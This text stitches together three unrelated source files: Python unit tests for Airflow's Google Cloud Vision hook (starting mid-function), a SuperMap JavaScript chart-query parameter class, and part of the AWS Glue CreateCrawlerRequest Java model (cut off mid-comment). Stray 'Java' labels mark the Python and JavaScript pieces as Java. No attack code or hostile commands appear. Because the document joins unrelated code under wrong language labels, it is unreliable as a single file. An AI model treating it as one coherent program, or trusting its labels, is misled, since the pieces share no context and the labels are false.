get_conn): # Given autogenerated_id = 'autogen-p-id' response_product = Product( name=ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id) ) create_product_method = get_conn.return_value.create_product create_product_method.return_value = response_product parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST) product = Product() # When result = self.hook.create_product( location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST ) # Then # Product ID was not provided in the method call above. Should be extracted from the API response # and returned. assert result == autogenerated_id create_product_method.assert_called_once_with( parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_create_product_autogenerated_id_wrong_name_in_response(self, get_conn): # Given wrong_name = 'wrong_name_not_a_correct_path' response_product = Product(name=wrong_name) create_product_method = get_conn.return_value.create_product create_product_method.return_value = response_product parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST) product = Product() # When with pytest.raises(AirflowException) as ctx: self.hook.create_product( location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST ) # Then # API response was wrong (wrong name format) and thus ProductSet ID extraction should fail. err = ctx.value assert 'Unable to get id from name' in str(err) create_product_method.assert_called_once_with( parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_create_product_autogenerated_id_wrong_api_response(self, get_conn): # Given response_product = None create_product_method = get_conn.return_value.create_product create_product_method.return_value = response_product parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST) product = Product() # When with pytest.raises(AirflowException) as ctx: self.hook.create_product( location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST ) # Then # API response was wrong (None) and thus ProductSet ID extraction should fail. err = ctx.value assert 'Unable to get name from response...' in str(err) create_product_method.assert_called_once_with( parent=parent, product=product, product_id=None, retry=None, timeout=None, metadata=None ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_product_no_explicit_name(self, get_conn): # Given product = Product() update_product_method = get_conn.return_value.update_product update_product_method.return_value = product product_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST) # When result = self.hook.update_product( location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, product=product, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) # Then assert result == MessageToDict(product) update_product_method.assert_called_once_with( product=Product(name=product_name), metadata=None, retry=None, timeout=None, update_mask=None ) @parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)]) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_product_no_explicit_name_and_missing_params_for_constructed_name( self, location, product_id, get_conn ): # Given update_product_method = get_conn.return_value.update_product update_product_method.return_value = None product = Product() # When with pytest.raises(AirflowException) as ctx: self.hook.update_product( location=location, product_id=product_id, product=product, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) err = ctx.value assert err assert ERR_UNABLE_TO_CREATE.format(label='Product', id_label='product_id') in str(err) update_product_method.assert_not_called() @parameterized.expand([(None, None), (None, PRODUCT_ID_TEST), (LOC_ID_TEST, None)]) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_product_explicit_name_missing_params_for_constructed_name( self, location, product_id, get_conn ): # Given explicit_p_name = ProductSearchClient.product_path( PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2 ) product = Product(name=explicit_p_name) update_product_method = get_conn.return_value.update_product update_product_method.return_value = product # When result = self.hook.update_product( location=location, product_id=product_id, product=product, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) # Then assert result == MessageToDict(product) update_product_method.assert_called_once_with( product=Product(name=explicit_p_name), metadata=None, retry=None, timeout=None, update_mask=None ) @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_update_product_explicit_name_different_from_constructed(self, get_conn): # Given update_product_method = get_conn.return_value.update_product update_product_method.return_value = None explicit_p_name = ProductSearchClient.product_path( PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCT_ID_TEST_2 ) product = Product(name=explicit_p_name) template_p_name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST) # When # Location and product_id are passed in addition to a Product with an explicit name, # but both names differ (constructed != explicit). # Should throw AirflowException in this case. with pytest.raises(AirflowException) as ctx: self.hook.update_product( location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, product=product, update_mask=None, project_id=PROJECT_ID_TEST, retry=None, timeout=None, metadata=None, ) err = ctx.value assert err assert ( ERR_DIFF_NAMES.format( explicit_name=explicit_p_name, constructed_name=template_p_name, label="Product", id_label="product_id", ) in str(err) ) update_product_method.assert_not_called() @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn') def test_delete_product(self, get_conn): # Given delete_product_method = get_conn.return_value.delete_product delete_product_method.return_value = None name = ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCT_ID_TEST) # When response = self.hook.delete_product( location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, project_id=PROJECT_ID_TEST ) # Then assert response is None delete_product_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_detect_text(self, annotator_client_mock): # Given detect_text_method = annotator_client_mock.text_detection detect_text_method.return_value = AnnotateImageResponse( text_annotations=[EntityAnnotation(description="test", score=0.5)] ) # When self.hook.text_detection(image=DETECT_TEST_IMAGE) # Then detect_text_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_detect_text_with_additional_properties(self, annotator_client_mock): # Given detect_text_method = annotator_client_mock.text_detection detect_text_method.return_value = AnnotateImageResponse( text_annotations=[EntityAnnotation(description="test", score=0.5)] ) # When self.hook.text_detection( image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"} ) # Then detect_text_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2" ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_detect_text_with_error_response(self, annotator_client_mock): # Given detect_text_method = annotator_client_mock.text_detection detect_text_method.return_value = AnnotateImageResponse( error={"code": 3, "message": "test error message"} ) # When with pytest.raises(AirflowException) as ctx: self.hook.text_detection(image=DETECT_TEST_IMAGE) err = ctx.value assert "test error message" in str(err) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_document_text_detection(self, annotator_client_mock): # Given document_text_detection_method = annotator_client_mock.document_text_detection document_text_detection_method.return_value = AnnotateImageResponse( text_annotations=[EntityAnnotation(description="test", score=0.5)] ) # When self.hook.document_text_detection(image=DETECT_TEST_IMAGE) # Then document_text_detection_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_document_text_detection_with_additional_properties(self, annotator_client_mock): # Given document_text_detection_method = annotator_client_mock.document_text_detection document_text_detection_method.return_value = AnnotateImageResponse( text_annotations=[EntityAnnotation(description="test", score=0.5)] ) # When self.hook.document_text_detection( image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"} ) # Then document_text_detection_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2" ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_detect_document_text_with_error_response(self, annotator_client_mock): # Given detect_text_method = annotator_client_mock.document_text_detection detect_text_method.return_value = AnnotateImageResponse( error={"code": 3, "message": "test error message"} ) # When with pytest.raises(AirflowException) as ctx: self.hook.document_text_detection(image=DETECT_TEST_IMAGE) err = ctx.value assert "test error message" in str(err) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_label_detection(self, annotator_client_mock): # Given label_detection_method = annotator_client_mock.label_detection label_detection_method.return_value = AnnotateImageResponse( label_annotations=[EntityAnnotation(description="test", score=0.5)] ) # When self.hook.label_detection(image=DETECT_TEST_IMAGE) # Then label_detection_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_label_detection_with_additional_properties(self, annotator_client_mock): # Given label_detection_method = annotator_client_mock.label_detection label_detection_method.return_value = AnnotateImageResponse( label_annotations=[EntityAnnotation(description="test", score=0.5)] ) # When self.hook.label_detection( image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"} ) # Then label_detection_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2" ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_label_detection_with_error_response(self, annotator_client_mock): # Given detect_text_method = annotator_client_mock.label_detection detect_text_method.return_value = AnnotateImageResponse( error={"code": 3, "message": "test error message"} ) # When with pytest.raises(AirflowException) as ctx: self.hook.label_detection(image=DETECT_TEST_IMAGE) err = ctx.value assert "test error message" in str(err) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_safe_search_detection(self, annotator_client_mock): # Given safe_search_detection_method = annotator_client_mock.safe_search_detection safe_search_detection_method.return_value = AnnotateImageResponse( safe_search_annotation=SafeSearchAnnotation( adult="VERY_UNLIKELY", spoof="VERY_UNLIKELY", medical="VERY_UNLIKELY", violence="VERY_UNLIKELY", racy="VERY_UNLIKELY", ) ) # When self.hook.safe_search_detection(image=DETECT_TEST_IMAGE) # Then safe_search_detection_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_safe_search_detection_with_additional_properties(self, annotator_client_mock): # Given safe_search_detection_method = annotator_client_mock.safe_search_detection safe_search_detection_method.return_value = AnnotateImageResponse( safe_search_annotation=SafeSearchAnnotation( adult="VERY_UNLIKELY", spoof="VERY_UNLIKELY", medical="VERY_UNLIKELY", violence="VERY_UNLIKELY", racy="VERY_UNLIKELY", ) ) # When self.hook.safe_search_detection( image=DETECT_TEST_IMAGE, additional_properties={"prop1": "test1", "prop2": "test2"} ) # Then safe_search_detection_method.assert_called_once_with( image=DETECT_TEST_IMAGE, max_results=None, retry=None, timeout=None, prop1="test1", prop2="test2" ) @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client") def test_safe_search_detection_with_error_response(self, annotator_client_mock): # Given detect_text_method = annotator_client_mock.safe_search_detection detect_text_method.return_value = AnnotateImageResponse( error={"code": 3, "message": "test error message"} ) # When with pytest.raises(AirflowException) as ctx: self.hook.safe_search_detection(image=DETECT_TEST_IMAGE) err = ctx.value assert "test error message" in str(err)
Java
/* COPYRIGHT 2012 SUPERMAP * 本程序只能在有效的授权许可下使用。 * 未经许可,不得以任何手段擅自使用或传播。*/ /** * @requires SuperMap/Util.js * @requires SuperMap/REST.js */ /** * Class: SuperMap.REST.ChartQueryParameters * 海图查询参数类,该类用于设置海图查询时的相关参数,海图查询分为海图属性 * 查询和海图范围查询两类,通过属性queryMode指定查询模式。必设属性有: * queryMode、chartLayerNames、chartQueryFilterParameters。当进行海图范围查询时,必设属性还包括bounds。 */ SuperMap.REST.ChartQueryParameters = SuperMap.Class({ /** * APIProperty: queryMode * {String} 海图查询模式类型,SuperMap iClient for JavaScript对海图支持两种 * 查询方式:海图属性查询("ChartAttributeQuery")和海图空间查询 * ("ChartBoundsQuery") 。 */ queryMode:null, /** * APIProperty: bounds * {<SuperMap.Bounds>} 海图查询范围。 */ bounds:null, /** * APIProperty: chartLayerNames * {Array(String)} 查询的海图图层的名称。 */ chartLayerNames:null, /** * APIProperty: chartQueryFilterParameters * {Array <SuperMap.REST.ChartQueryFilterParameter>} 海图查询过滤参数。 * 包括:物标代码、物标可应用对象的选择(是否查询点、线或面)、属性字 * 段过滤条件。 */ chartQueryFilterParameters:null, /** * Property: returnContent * {Boolean} 获取或设置是返回查询结果记录集 recordsets,还是返回查询结果的 * 资源 resourceInfo。默认为 true,表示返回 recordsets。 * * note: Recordsets 和 ResourceInfo 都存储在查询结果类 QueryResult 中。 * 当 * (start code) * ReturnContent = true * (end) * 表示返回查询记录集,这时 * 查询结果存储在 * (start code) * QueryResult.Recordsets * (end) * 中,而 * (start code) * QueryResult.ResourceInfo * (end) * 为空;当 * (start code) * ReturnContent = false * (end) * 时,表示返回查询结果资源,这时查询结果存储在 * (start code) * QueryResult.ResourceInfo * (end) * 中,而 * (start code) * QueryResult.Recordsets * (end) * 为空。 */ returnContent:true, /** * APIProperty: startRecord * {Number} 查询起始记录位置,默认为0。 */ startRecord:0, /** * APIProperty: expectCount * {Number} 期望查询结果返回的记录数,该值大于0。 */ expectCount:null, /** * Constructor: SuperMap.REST.ChartQueryParameters * 初始化 ChartQueryParameters 类的新实例。 * * Parameters: * options - {Object} 参数。 * * Allowed options properties: * queryMode - {String} 海图查询模式类型,SuperMap iClient for JavaScript对 * 海图支持两种查询方式:海图属性查询("ChartAttributeQuery")和海图空 * 间查询("ChartBoundsQuery") 。 * bounds - {<SuperMap.Bounds>} 海图查询范围。 * chartLayerNames - {Array(String)} 查询的海图图层的名称。 * chartQueryFilterParameters - {Array <SuperMap.REST.ChartQueryFilterParameter>} * 海图查询过滤参数。包括:物标代码、物标可应用对象的选择(是否查询点、 * 线或面)、属性字段过滤条件。 * returnContent - {Boolean} 获取或设置是返回查询结果记录集 recordsets,还 * 是返回查询结果的资源 resourceInfo。默认为 true,表示返回 recordsets。 * startRecord - {Number} 查询起始记录位置,默认为0。 * expectCount - {Number} 期望查询结果返回的记录数,该值大于0。 */ initialize:function (options) { if (!options) { return; } SuperMap.Util.extend(this, options); }, /** * APIMethod: destroy * 释放资源,将引用资源的属性置空。 */ destroy:function () { var me = this; me.queryMode = null; me.bounds = null; me.chartLayerNames = null; me.chartQueryFilterParameters = null; me.returnContent = true; me.startRecord = 0; me.expectCount = null; }, /** * Method: getVariablesJson * 将属性信息转换成能够被服务识别的JSON格式字符串。 */ getVariablesJson:function () { var json=""; json += "\"queryMode\":\"" + this.queryMode + "\","; if (this.chartLayerNames && this.chartLayerNames.length) { var chartLayersArray = []; var layerLength = this.chartLayerNames.length; for (var i = 0; i < layerLength; i++) { chartLayersArray.push("\""+this.chartLayerNames[i]+"\""); } var layerNames = "[" + chartLayersArray.join(",") + "]"; json += "\"chartLayerNames\":" + layerNames + ","; } if (this.queryMode === "ChartBoundsQuery" && this.bounds) { json += "\"bounds\":" + "{" + "\"leftBottom\":" + "{" + "\"x\":" + this.bounds.left + "," + "\"y\":" + this.bounds.bottom + "}" + "," + "\"rightTop\":" + "{" + "\"x\":" + this.bounds.right + "," + "\"y\":" + this.bounds.top + "}" + "},"; } if (this.chartQueryFilterParameters && this.chartQueryFilterParameters.length) { var chartParamArray = []; var chartLength = this.chartQueryFilterParameters.length; for (var j = 0; j < chartLength; j++) { var chartQueryFilterParameter = new SuperMap.REST.ChartQueryFilterParameter(); chartQueryFilterParameter = this.chartQueryFilterParameters[j]; chartParamArray.push(chartQueryFilterParameter.toJson()); } var chartParamsJson = "[" + chartParamArray.join(",") + "]"; chartParamsJson = "\"chartQueryParams\":" + chartParamsJson + ","; chartParamsJson += "\"startRecord\":" + this.startRecord + ","; chartParamsJson += "\"expectCount\":" + this.expectCount; chartParamsJson = "{" + chartParamsJson + "}"; json += "\"chartQueryParameters\":" + chartParamsJson; } json = "{" + json + "}"; return json; }, CLASS_NAME:"SuperMap.REST.ChartQueryParameters" })
Java
/* * Copyright 2017-2022 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.glue.model; import java.io.Serializable; import javax.annotation.Generated; import com.amazonaws.AmazonWebServiceRequest; /** * * @see <a href="http://docs.aws.amazon.com/goto/WebAPI/glue-2017-03-31/CreateCrawler" target="_top">AWS API * Documentation</a> */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public class CreateCrawlerRequest extends com.amazonaws.AmazonWebServiceRequest implements Serializable, Cloneable { /** * <p> * Name of the new crawler. * </p> */ private String name; /** * <p> * The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources. * </p> */ private String role; /** * <p> * The Glue database where results are written, such as: * <code>arn:aws:daylight:us-east-1::database/sometable/*</code>. * </p> */ private String databaseName; /** * <p> * A description of the new crawler. * </p> */ private String description; /** * <p> * A list of collection of targets to crawl. * </p> */ private CrawlerTargets targets; /** * <p> * A <code>cron</code> expression used to specify the schedule (see <a * href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based Schedules for * Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would specify: * <code>cron(15 12 * * ? *)</code>. * </p> */ private String schedule; /** * <p> * A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a * crawl, but these custom classifiers always override the default classifiers for a given classification. * </p> */ private java.util.List<String> classifiers; /** * <p> * The table prefix used for catalog tables that are created. * </p> */ private String tablePrefix; /** * <p> * The policy for the crawler's update and deletion behavior. * </p> */ private SchemaChangePolicy schemaChangePolicy; /** * <p> * A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were added since * the last crawler run. * </p> */ private RecrawlPolicy recrawlPolicy; /** * <p> * Specifies data lineage configuration settings for the crawler. * </p> */ private LineageConfiguration lineageConfiguration; private LakeFormationConfiguration lakeFormationConfiguration; /** * <p> * Crawler configuration information. This versioned JSON string allows users to specify aspects of a crawler's * behavior. For more information, see <a * href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>. * </p> */ private String configuration; /** * <p> * The name of the <code>SecurityConfiguration</code> structure to be used by this crawler. * </p> */ private String crawlerSecurityConfiguration; /** * <p> * The tags to use with this crawler request. You may use tags to limit access to the crawler. For more information * about tags in Glue, see <a href="https://docs.aws.amazon.com/glue/latest/dg/monitor-tags.html">Amazon Web * Services Tags in Glue</a> in the developer guide. * </p> */ private java.util.Map<String, String> tags; /** * <p> * Name of the new crawler. * </p> * * @param name * Name of the new crawler. */ public void setName(String name) { this.name = name; } /** * <p> * Name of the new crawler. * </p> * * @return Name of the new crawler. */ public String getName() { return this.name; } /** * <p> * Name of the new crawler. * </p> * * @param name * Name of the new crawler. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withName(String name) { setName(name); return this; } /** * <p> * The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources. * </p> * * @param role * The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer * resources. */ public void setRole(String role) { this.role = role; } /** * <p> * The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources. * </p> * * @return The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer * resources. */ public String getRole() { return this.role; } /** * <p> * The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer resources. * </p> * * @param role * The IAM role or Amazon Resource Name (ARN) of an IAM role used by the new crawler to access customer * resources. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withRole(String role) { setRole(role); return this; } /** * <p> * The Glue database where results are written, such as: * <code>arn:aws:daylight:us-east-1::database/sometable/*</code>. * </p> * * @param databaseName * The Glue database where results are written, such as: * <code>arn:aws:daylight:us-east-1::database/sometable/*</code>. */ public void setDatabaseName(String databaseName) { this.databaseName = databaseName; } /** * <p> * The Glue database where results are written, such as: * <code>arn:aws:daylight:us-east-1::database/sometable/*</code>. * </p> * * @return The Glue database where results are written, such as: * <code>arn:aws:daylight:us-east-1::database/sometable/*</code>. */ public String getDatabaseName() { return this.databaseName; } /** * <p> * The Glue database where results are written, such as: * <code>arn:aws:daylight:us-east-1::database/sometable/*</code>. * </p> * * @param databaseName * The Glue database where results are written, such as: * <code>arn:aws:daylight:us-east-1::database/sometable/*</code>. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withDatabaseName(String databaseName) { setDatabaseName(databaseName); return this; } /** * <p> * A description of the new crawler. * </p> * * @param description * A description of the new crawler. */ public void setDescription(String description) { this.description = description; } /** * <p> * A description of the new crawler. * </p> * * @return A description of the new crawler. */ public String getDescription() { return this.description; } /** * <p> * A description of the new crawler. * </p> * * @param description * A description of the new crawler. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withDescription(String description) { setDescription(description); return this; } /** * <p> * A list of collection of targets to crawl. * </p> * * @param targets * A list of collection of targets to crawl. */ public void setTargets(CrawlerTargets targets) { this.targets = targets; } /** * <p> * A list of collection of targets to crawl. * </p> * * @return A list of collection of targets to crawl. */ public CrawlerTargets getTargets() { return this.targets; } /** * <p> * A list of collection of targets to crawl. * </p> * * @param targets * A list of collection of targets to crawl. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withTargets(CrawlerTargets targets) { setTargets(targets); return this; } /** * <p> * A <code>cron</code> expression used to specify the schedule (see <a * href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based Schedules for * Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would specify: * <code>cron(15 12 * * ? *)</code>. * </p> * * @param schedule * A <code>cron</code> expression used to specify the schedule (see <a * href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based * Schedules for Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would * specify: <code>cron(15 12 * * ? *)</code>. */ public void setSchedule(String schedule) { this.schedule = schedule; } /** * <p> * A <code>cron</code> expression used to specify the schedule (see <a * href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based Schedules for * Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would specify: * <code>cron(15 12 * * ? *)</code>. * </p> * * @return A <code>cron</code> expression used to specify the schedule (see <a * href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based * Schedules for Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would * specify: <code>cron(15 12 * * ? *)</code>. */ public String getSchedule() { return this.schedule; } /** * <p> * A <code>cron</code> expression used to specify the schedule (see <a * href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based Schedules for * Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would specify: * <code>cron(15 12 * * ? *)</code>. * </p> * * @param schedule * A <code>cron</code> expression used to specify the schedule (see <a * href="https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html">Time-Based * Schedules for Jobs and Crawlers</a>. For example, to run something every day at 12:15 UTC, you would * specify: <code>cron(15 12 * * ? *)</code>. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withSchedule(String schedule) { setSchedule(schedule); return this; } /** * <p> * A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a * crawl, but these custom classifiers always override the default classifiers for a given classification. * </p> * * @return A list of custom classifiers that the user has registered. By default, all built-in classifiers are * included in a crawl, but these custom classifiers always override the default classifiers for a given * classification. */ public java.util.List<String> getClassifiers() { return classifiers; } /** * <p> * A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a * crawl, but these custom classifiers always override the default classifiers for a given classification. * </p> * * @param classifiers * A list of custom classifiers that the user has registered. By default, all built-in classifiers are * included in a crawl, but these custom classifiers always override the default classifiers for a given * classification. */ public void setClassifiers(java.util.Collection<String> classifiers) { if (classifiers == null) { this.classifiers = null; return; } this.classifiers = new java.util.ArrayList<String>(classifiers); } /** * <p> * A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a * crawl, but these custom classifiers always override the default classifiers for a given classification. * </p> * <p> * <b>NOTE:</b> This method appends the values to the existing list (if any). Use * {@link #setClassifiers(java.util.Collection)} or {@link #withClassifiers(java.util.Collection)} if you want to * override the existing values. * </p> * * @param classifiers * A list of custom classifiers that the user has registered. By default, all built-in classifiers are * included in a crawl, but these custom classifiers always override the default classifiers for a given * classification. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withClassifiers(String... classifiers) { if (this.classifiers == null) { setClassifiers(new java.util.ArrayList<String>(classifiers.length)); } for (String ele : classifiers) { this.classifiers.add(ele); } return this; } /** * <p> * A list of custom classifiers that the user has registered. By default, all built-in classifiers are included in a * crawl, but these custom classifiers always override the default classifiers for a given classification. * </p> * * @param classifiers * A list of custom classifiers that the user has registered. By default, all built-in classifiers are * included in a crawl, but these custom classifiers always override the default classifiers for a given * classification. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withClassifiers(java.util.Collection<String> classifiers) { setClassifiers(classifiers); return this; } /** * <p> * The table prefix used for catalog tables that are created. * </p> * * @param tablePrefix * The table prefix used for catalog tables that are created. */ public void setTablePrefix(String tablePrefix) { this.tablePrefix = tablePrefix; } /** * <p> * The table prefix used for catalog tables that are created. * </p> * * @return The table prefix used for catalog tables that are created. */ public String getTablePrefix() { return this.tablePrefix; } /** * <p> * The table prefix used for catalog tables that are created. * </p> * * @param tablePrefix * The table prefix used for catalog tables that are created. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withTablePrefix(String tablePrefix) { setTablePrefix(tablePrefix); return this; } /** * <p> * The policy for the crawler's update and deletion behavior. * </p> * * @param schemaChangePolicy * The policy for the crawler's update and deletion behavior. */ public void setSchemaChangePolicy(SchemaChangePolicy schemaChangePolicy) { this.schemaChangePolicy = schemaChangePolicy; } /** * <p> * The policy for the crawler's update and deletion behavior. * </p> * * @return The policy for the crawler's update and deletion behavior. */ public SchemaChangePolicy getSchemaChangePolicy() { return this.schemaChangePolicy; } /** * <p> * The policy for the crawler's update and deletion behavior. * </p> * * @param schemaChangePolicy * The policy for the crawler's update and deletion behavior. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withSchemaChangePolicy(SchemaChangePolicy schemaChangePolicy) { setSchemaChangePolicy(schemaChangePolicy); return this; } /** * <p> * A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were added since * the last crawler run. * </p> * * @param recrawlPolicy * A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were * added since the last crawler run. */ public void setRecrawlPolicy(RecrawlPolicy recrawlPolicy) { this.recrawlPolicy = recrawlPolicy; } /** * <p> * A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were added since * the last crawler run. * </p> * * @return A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were * added since the last crawler run. */ public RecrawlPolicy getRecrawlPolicy() { return this.recrawlPolicy; } /** * <p> * A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were added since * the last crawler run. * </p> * * @param recrawlPolicy * A policy that specifies whether to crawl the entire dataset again, or to crawl only folders that were * added since the last crawler run. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withRecrawlPolicy(RecrawlPolicy recrawlPolicy) { setRecrawlPolicy(recrawlPolicy); return this; } /** * <p> * Specifies data lineage configuration settings for the crawler. * </p> * * @param lineageConfiguration * Specifies data lineage configuration settings for the crawler. */ public void setLineageConfiguration(LineageConfiguration lineageConfiguration) { this.lineageConfiguration = lineageConfiguration; } /** * <p> * Specifies data lineage configuration settings for the crawler. * </p> * * @return Specifies data lineage configuration settings for the crawler. */ public LineageConfiguration getLineageConfiguration() { return this.lineageConfiguration; } /** * <p> * Specifies data lineage configuration settings for the crawler. * </p> * * @param lineageConfiguration * Specifies data lineage configuration settings for the crawler. * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withLineageConfiguration(LineageConfiguration lineageConfiguration) { setLineageConfiguration(lineageConfiguration); return this; } /** * @param lakeFormationConfiguration */ public void setLakeFormationConfiguration(LakeFormationConfiguration lakeFormationConfiguration) { this.lakeFormationConfiguration = lakeFormationConfiguration; } /** * @return */ public LakeFormationConfiguration getLakeFormationConfiguration() { return this.lakeFormationConfiguration; } /** * @param lakeFormationConfiguration * @return Returns a reference to this object so that method calls can be chained together. */ public CreateCrawlerRequest withLakeFormationConfiguration(LakeFormationConfiguration lakeFormationConfiguration) { setLakeFormationConfiguration(lakeFormationConfiguration); return this; } /** * <p> * Crawler configuration information. This versioned JSON string allows users to specify aspects of a crawler's * behavior. For more information, see <a * href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>. * </p> * * @param configuration * Crawler configuration information. This versioned JSON string allows users to specify aspects of a * crawler's behavior. For more information, see <a * href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring a Crawler</a>. */ public void setConfiguration(String configuration) { this.configuration = configuration; } /** * <p> * Crawler configuration information. This versioned JSON string allows users to specify aspects of a crawler's * behavior. For more information, see <a * href="https://docs.aws.amazon.com/glue/latest/dg/crawler-configuration.html">Configuring 